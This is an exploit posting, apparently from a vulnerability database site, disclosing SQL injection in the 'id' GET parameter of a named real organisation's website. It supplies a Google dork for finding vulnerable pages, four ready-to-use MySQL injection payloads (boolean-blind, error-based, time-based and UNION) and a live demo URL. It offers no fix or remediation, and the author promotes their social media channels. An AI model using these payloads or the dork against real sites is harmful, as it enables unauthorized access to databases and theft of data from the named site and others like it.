Asfaa - SQL Injection vulnerability

2020.09.02
tr Hacksolist (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

********************************************************* #Exploit Title: Asfaa - SQL Injection vulnerability #Date: 2020-09-02 #Exploit Author: Hacksolist #Google Dork: site:asfaa.org inurl:.php?id= #Category:webapps #Tested On: KaliLinux 20.3, Tor Proof: Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-1795 OR 5496=5496# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: id=-7119 OR 1 GROUP BY CONCAT(0x717a7a7a71,(SELECT (CASE WHEN (6257=6257) THEN 1 ELSE 0 END)),0x71716b6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: id=(CASE WHEN (4341=4341) THEN SLEEP(5) ELSE 4341 END) Type: UNION query Title: MySQL UNION query (random number) - 4 columns Payload: id=-5411 UNION ALL SELECT 2531,CONCAT(0x717a7a7a71,0x764f4667487649697a66535566745641494871726c57774574584570776975414153486d70446e56,0x71716b6b71),2531,2531# Demo 1: http://www.asfaa.org/ ********************************************************* #Discovered by: Hacksolist #YouTube: https://www.youtube.com/channel/UCEKf0RaRYmLWRofV_F8xrJg #Twitter: https://twitter.com/codesolist *********************************************************

References:

#YouTube:
https://www.youtube.com/channel/UCEKf0RaRYmLWRofV_F8xrJg
#Twitter:
https://twitter.com/codesolist


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top